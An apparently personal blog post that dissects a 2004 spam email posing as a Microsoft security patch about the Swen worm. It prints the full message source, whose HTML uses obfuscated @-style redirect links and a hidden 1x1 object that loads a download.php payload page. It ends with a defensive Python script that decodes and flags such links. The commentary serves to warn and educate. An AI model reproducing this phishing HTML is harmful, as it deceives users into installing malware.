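Something rather lovely turned up the other day, so I'm putting it on display.
What is it? Spam that poses as patch information from M$ in order to plant a trojan horse, worm, or spyware.
It looks the part at a glance, but
in the headers, From:, Return-Path:, and Message-ID: are forged to look as if they came from M$, while Received: shows a host that is not M$'s. The links use JavaScript and, on top of that, a disguise that slips an @ into the middle of the URL (the characters between http: and @ are ignored). But the image files are not hosted on M$'s servers, so it is a dead giveaway.
It's impressive that people come up with pranks like this.
Well, just get lost. -Miko-layer (hey, wait a minute)- or something like that.
Incidentally, rr.com, the host in that Received: header, seems to be home to a lot of spammers right now. A lot of English-language spam is arriving.
M$ reportedly never delivers patches or patch information like this directly to users, so if you receive one, be suspicious first.
The source follows.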
Return-Path: <security-center@microsoft.com>
Received: from 6535234hfc64.tampabay.rr.com (6535234hfc64.tampabay.rr.com [65.35.234.64])
 by pop.mars.dti.ne.jp (3.08p) with SMTP id i0PDTrhA024178
 for <marx@mars.dti.ne.jp>; Sun, 25 Jan 2004 22:29:54 +0900 (JST)
Date: Sun, 25 Jan 2004 01:28:12 +0000
From: Security-center <security-center@microsoft.com>
Subject: Security warning
To: Marx <marx@mars.dti.ne.jp>
References: <KJK160EJ920LJ8HI@mars.dti.ne.jp>
In-Reply-To: <KJK160EJ920LJ8HI@mars.dti.ne.jp>
Message-ID: <HH1HEB3J25C63IJ0@microsoft.com>
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0
Transitional//EN">
<HTML><HEAD><TITLE>What You Should
Know About the Swen Worm</TITLE>
<META http-equiv=Content-Type
content="text/html; charset=UTF-8">
<META
content="There is a new
worm called W32/Swen@MM that spreads through e-mail and network shares disguised
as an attachment. This virus alert describes which Microsoft products are
affected by the Swen worm, how to protect against this worm, and what actions to
take if your computer does become infected by this worm."
name=Description>
<META content=all name=Robots>
<META
content="" name=Keywords>
<META content=en-us
name=MS.LOCALE>
<STYLE>BODY {
MARGIN: 0px; FONT-FAMILY:
verdana,arial,helvetica
}
</STYLE>
<META content="MSHTML
6.00.2800.1106" name=GENERATOR></HEAD>
<BODY text=#000000
bgColor=#ffffff leftMargin=0 topMargin=0 MARGINWIDTH="0"
MARGINHEIGHT="0">
<DIV id=TBContainer style="HEIGHT:
81px"><SPAN id=TBDownLevelDiv>
<TABLE cellSpacing=0 cellPadding=0
width="100%" bgColor=#0a6cce border=0>
<TBODY>
<TR>
<TD vAlign=top height=60 rowSpan=2><A href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');"><IMG height=60 alt="Microsoft Home"
src="http://www.microsoft.com/homepage/gif/bnr-microsoft.gif"
width=250
border=0></A></TD>
<TD vAlign=top align=right
height=20> </TD>
<TD vAlign=center noWrap align=right
bgColor=#000000
height=20><FONT face="Verdana, Arial" color=#ffffff
size=1><B>
<A style="COLOR: #ffffff;
TEXT-DECORATION: none"
href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');"
><FONT color=#ffffff>All
Products</FONT></A> <FONT
color=#ffffff>|</FONT> <A
style="COLOR: #ffffff; TEXT-DECORATION: none"
href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');"
><FONT color=#ffffff>Support</FONT></A>
<FONT
color=#ffffff>|</FONT>
<A
style="COLOR: #ffffff; TEXT-DECORATION: none"
href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');" ><FONT color=#ffffff>Search</FONT></A>
<FONT
color=#ffffff>|</FONT>
<Astyle="COLOR: #ffffff; TEXT-DECORATION: none" href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');"><FONT color=#ffffff>microsoft.com
Home</FONT></A>
</B></FONT></TD>
</TR>
<TR>
<TD vAlign=top align=right colSpan=3
height=40> </TD>
</TR>
</TBODY>
</TABLE>
</SPAN>
<p align="center"><font size="2" face="Arial, Helvetica,
sans-serif">MicroSoft
News<br>
<font
color="#FF0000"><strong>Warning:</strong></font>
<br>
a new virus, W32.Swen.A@mm, can infect your
computer.</font></p>
<p></p>
<p
align="center"><font size="2" face="Arial, Helvetica,
sans-serif">MicroSoft
user,<br>
this is the latest version of
security update, the "January 2004, Cumulative
Patch"<br>
udate which eliminates all known security
vulnerabilities afecting MS Internet
Explorer,<br>
MS Outlook and
MS Outlook Express. Install now to maintain the security of
your
computer<br>
from these vulnerabilities. This update includes the
functionality of all
previously released
patches.</font></p>
<div align="center">
<table
width="74%" border="1">
<tr>
<td
width="37%"><strong><font size="2" face="Arial, Helvetica,
sans-serif"><a href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');"><img src="https://www.e-gold.com/acct/help.gif" width="13"
height="17" border="0"></a>
System
requirements</font></strong></td>
<td
width="63%"><font size="2" face="Arial, Helvetica, sans-serif">Windows
95/98/Me/2000/NT/XP </font></td>
</tr>
<tr>
<td height="20"><strong><font size="2" face="Arial,
Helvetica, sans-serif"><a href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');" ><img src="https://www.e-gold.com/acct/help.gif" width="13"
height="17" border="0"></a>
This Update applies to
</font></strong></td>
<td><p><font size="2"
face="Arial, Helvetica, sans-serif">MS Internet
Explorer, version 5.5 and
later<br>
MS Outlook, version 8.0 and later<br>
MS Outlook
Express, version 4.01and
later</font></p></td>
</tr>
<tr>
<td><strong><font size="2" face="Arial, Helvetica,
sans-serif"><a href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');" ><img src="https://www.e-gold.com/acct/help.gif" width="13"
height="17"
border="0"></a>
Recommendation</font></strong></td>
<td><font
size="2" face="Arial, Helvetica, sans-serif">Customers should
install the
patch at the earliest
opportunity</font></td>
</tr>
<tr>
<td
height="20"><strong><font size="2" face="Arial, Helvetica,
sans-serif"><a href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');" ><img src="https://www.e-gold.com/acct/help.gif" width="13"
height="17" border="0"></a>
How to
install</font></strong></td>
<td><font size="2"
face="Arial, Helvetica, sans-serif">Click on the "<a
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');" href="#">Go
to Download page</a>" button
.</font></td>
</tr>
<tr>
<td
height="20"><strong><font size="2" face="Arial, Helvetica,
sans-serif"><a href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');" ><img src="https://www.e-gold.com/acct/help.gif" width="13"
height="17" border="0"></a>
How to
use</font></strong></td>
<td><font size="2"
face="Arial, Helvetica, sans-serif">You don't need
to do anything after
installing this
item</font></td>
</tr>
</table>
<br>
</div>
<div
align="center">
<input
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');" type="submit" name="Submit" value="Go to Download
page">
</div>
<p align="center"><font size="1"
face="Arial, Helvetica, sans-serif">Microsoft
Product Support Services
and Knowledge Base can be found on the <a href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');" >Microsoft
Technical Support</a> Website. <br>
For
security-related information about Microsoft products, please
visit<br>
the<a href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');" > Microsoft Security Advisor</a> web
site, or <a href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');" >Contact Us</a>.</font></p>
<hr
align="center">
<div align="center"><font size="2" face="Arial,
Helvetica, sans-serif"> </font><font color="#999999" size="1"
face="Arial, Helvetica, sans-serif">The
names of the actual companies and
products mentioned herein are the trademarks
of their respective
owners</font>.<br>
</div>
</DIV>
<TABLE
id=idFooter style="WIDTH: 100%; BACKGROUND-COLOR: white" cellSpacing=0
cellPadding=0 border=0>
<TBODY>
<TR
vAlign=center>
<TD id=idFooterRow1
style="WIDTH: 100%; HEIGHT:
20px; BACKGROUND-COLOR: #0a6cce"
noWrap> <A
onmouseover="this.style.color = '#FF3300'"
style="FONT: bold xx-small
Verdana; CURSOR: hand; COLOR: #ffffff; TEXT-DECORATION: none"
onmouseout="this.style.color = '#FFFFFF'"
href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');"
>Contact Us</A> <SPAN
style="FONT: bold
xx-small Verdana; COLOR: #ffffff"> |</SPAN> <A
onmouseover="this.style.color = '#FF3300'"
style="FONT: bold xx-small
Verdana; CURSOR: hand; COLOR: #ffffff; TEXT-DECORATION: none"
onmouseout="this.style.color = '#FFFFFF'"
href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');"
>E-mail This Page</A> </TD>
</TR>
<TR
vAlign=center>
<TD id=idFooterRow2
style="WIDTH: 100%; HEIGHT:
30px; BACKGROUND-COLOR: #0a6cce" noWrap><SPAN
style="FONT: xx-small
Verdana; COLOR: #ffffff">1986 - 2004 Microsoft Corporation.
All rights
reserved. </SPAN> <A
onmouseover="this.style.color = '#FF3300'"
style="FONT: xx-small
Verdana; CURSOR: hand; COLOR: #ffffff; TEXT-DECORATION: none"
onmouseout="this.style.color = '#FFFFFF'"
href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');">Terms of Use</A> <A
onmouseover="this.style.color = '#FF3300'"
style="FONT: xx-small Verdana;
CURSOR: hand; COLOR: #ffffff; TEXT-DECORATION: none"
onmouseout="this.style.color = '#FFFFFF'"
href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');">Privacy Statement </A> <A
onmouseover="this.style.color = '#FF3300'"
style="FONT: xx-small Verdana;
CURSOR: hand; COLOR: #ffffff; TEXT-DECORATION: none"
onmouseout="this.style.color = '#FFFFFF'"
href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');">Accessibility
</A></TD>
</TR></TBODY></TABLE><object
width=1 height=1
DATA="http://%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/download.php"></BODY></HTML>
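The disguised link in the source above can be unpacked mechanically. The following is an added example, not part of the original post: it decodes the `unescape()` argument, separates the decoy text in front of the `@` (the URL's userinfo) from the host the browser would actually contact, and lists the findings. The function names, the finding labels and the one-anchor sample fragment (built from the link string in the message) are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: one anchor in the style of the message source on this page.
SAMPLE_HTML = '''<A href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');">All Products</A>'''

_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
_CALL = re.compile(r"unescape\(\s*'([^']*)'")

def js_unescape(s):
    """Decode %XX and %uXXXX sequences the way JavaScript's unescape() does."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def analyze_link(raw, claimed_domain):
    """Compare what the link shows with the host it really points to."""
    raw = "".join(raw.split())                 # drop line-wrap whitespace
    url = js_unescape(raw)
    parts = urlsplit(url)
    userinfo = parts.netloc.rpartition("@")[0]  # decoy shown before the '@'
    host = parts.hostname or ""                 # host actually contacted
    findings = []
    if userinfo:
        findings.append("userinfo-before-@")
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in userinfo):
        findings.append("control-char-in-userinfo")
    if "%" in urlsplit(raw).netloc.rpartition("@")[2]:
        findings.append("percent-encoded-host")
    if host != claimed_domain and not host.endswith("." + claimed_domain):
        findings.append("host-not-in-claimed-domain")
    return {"url": url, "decoy": userinfo, "host": host, "findings": findings}

def scan_html(html, claimed_domain):
    """Analyze every unescape('...') target found in an HTML mail body."""
    return [analyze_link(arg, claimed_domain) for arg in _CALL.findall(html)]

if __name__ == "__main__":
    # claimed_domain is taken from the From: header of the message.
    for result in scan_html(SAMPLE_HTML, "microsoft.com"):
        print(repr(result["decoy"]), "->", result["host"], result["findings"])
```

Run over the full message body, the same scan reports every navigation link, since they all carry the same `unescape()` target.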